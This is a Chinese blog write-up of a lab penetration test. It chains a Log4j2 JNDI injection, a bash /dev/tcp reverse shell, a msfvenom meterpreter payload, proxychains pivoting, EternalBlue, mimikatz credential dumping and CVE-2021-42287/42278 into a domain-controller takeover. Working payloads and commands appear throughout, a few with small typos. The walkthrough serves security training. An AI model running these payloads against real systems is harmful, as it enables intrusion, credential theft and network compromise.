记一次log4j2引发的渗透测试
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了记一次log4j2引发的渗透测试相关的知识,希望对你有一定的参考价值。
参考技术A 记一次log4j2打入内网并用CVE-2021-42287、CVE-2021-42278获取到DC权限的靶场渗透。首先对web进行端口扫描,发现38080端口和22端口
访问一下38080端口发现是一个error page
用Wappalyzer看一下是什么架构,但是好像没有检测出来
拿着报错去百度上发现应该是springboot
索性用goby再去扫一下,应该是spring没错,但是没有漏洞是什么操作?联想到最近出的log4j2的洞,可能他只是一个日志文件所以并没有框架
使用 payload=$jndi:ldap://p9j8l8.dnslog.cn 验证一下有回显证明存在漏洞
尝试进一步利用漏洞,首先起一个ldap服务,ip为本地接收shell的ip地址
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 192.168.1.105</pre>
抓包修改 Content-Type: appllication/x-www-form-urlencoded ,并执行以下payload成功回显
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">payload=$jndi: ldap://192.168.1.105:1389/TomcatBypass/TomcatEcho </pre>
执行 ls -al / 看一下也成功
nc开启监听端口
然后使用bash命令反弹,这里需要先base64编码然后对编码后的特殊字符进行2层url转码
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">bash -i >& /dev/tcp/192.168.1.105/9999 0>&1</pre>
抓包添加 payload=$jndi:ldap:1/192.168.1.105:1389/TomcatBypass/Command/Base64/二层转码之后的字符 ,即可得到反弹shell
进行信息搜集发现为docker环境,这里尝试了docker逃逸失败,那么继续进行信息搜集
在根目录下找到了第一个flag,这里有一个 got this ,在之前端口扫描的时候看到开放了22端口,尝试使用ssh直接连接
使用xshell尝试连接
连接成功,拿到了宿主机的权限
ifconfig查看网卡情况发现还有一张10.0.1.0/24段的网卡
这里方便的话其实可以使用cs上线linux后用cs继续打,这里我就没有上线cs,使用linux的命令对10.0.1.0/24段探测存货主机
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"> for i in 10.0.1.1..254; do if ping -c 3 -w 3 i Find the target; fi; done</pre>
ping一下是存活的
使用毒液把流量代理出来,首先开启监听
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">admin.exe -lport 7777</pre>
然后上传agent_linux到靶机上
加权并执行
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">chmod 777 agent_linux_x86
agent_linux_x86 -rhost 192.168.1.105 -rport 7777</pre>
连接成功
这里本来准备用毒液的代理到msf打的,后面觉得比较麻烦,就直接用kali生成的elf马上线msf了
首先生成一个32位的elf马
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf</pre>
然后加权并执行
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">chmod 777 shell.elf
./shell</pre>
kali使用 exploit/multi/handler 进行监听
获取到宿主机的shell
然后添加10.0.1.0/24段的路由
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">bg
route add 10.0.1.0 255.255.255.0 1
route print</pre>
然后配置 proxychain4.conf 文件并使用socks模块
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">search socks
use auxiliary/sevrer/socks_proxy
run</pre>
我们在之前已经知道了内网主机的ip,那么这里我们直接使用proxychain配合nmap对10.0.1.7的端口进行扫描
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">proxychains4 nmap -sT -Pn 10.0.1.7</pre>
发现有445端口,那么对445端口进一步扫描
先确定一下系统版本,使用 auxiliary/scanner/smb/smb_version 模块,发现是win7 sp1
看能不能利用永恒之蓝,这里使用到 auxiliary/scanner/smb/smb_ms17_010 模块,发现可以利用永恒之蓝
使用 exploit/windows/smb/ms17_010_eternalbule 模块,因为是不出网环境,这里需要用到 bind_tcp 载荷
run之后拿到一个system权限的meterpreter
在 C:\Users\root\Desktop 下拿到第二个flag
然后继续进行信息搜集,发现同样是双网卡,还存在10.0.0.0/24段的一张网卡
ipconfig /all看到dns服务器为 redteam.lab 应该在域内
这里ping一下 redteam.lab 得到域控的ip为10.0.0.12
这里不知道域控有什么洞,先上传一个mimikatz把密码抓取出来,得到 Administrator/Admin12345 ,这里其实就可以使用域管账户ipc直接连接,但是这里抓到了一个域用户,尝试使用最新的CVE-2021-42287、CVE-2021-42278来进行攻击,关于漏洞的原理请 移步
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">privilege::debug
sekurlsa::logonpasswords</pre>
这里我准备使用noPac.exe直接去获取一个shell的,但是这里noPac.exe的利用条件是需要主机上有.net4.0环境,所以这里没有回显
本来准备一步一步的用原始的方法打的,但是powershell用不了没有回显,就写一下原始利用的步骤吧
这里直接使用 sam_the_admin.py 进行攻击
<pre class="md-fences md-end-block ty-contain-cm modeLoaded" style="font-family: "Courier New", sans-serif; font-weight: 100; transition-duration: 0.2s; transition-property: background-color, border-color, border-radius, padding, margin, color, opacity; overflow: auto; margin: 10px auto; padding: 5px; background: rgb(245, 245, 245); border: 1px solid transparent; border-radius: 3px; color: rgb(0, 0, 0); font-size: 10px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">proxychains python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell</pre>
即可拿到DC的shell
在 C:\Users\Administrator\Desktop 下找到最后一个flag
记一次网站渗透的漏洞挖掘记录
文章目录
以上是关于记一次log4j2引发的渗透测试的主要内容,如果未能解决你的问题,请参考以下文章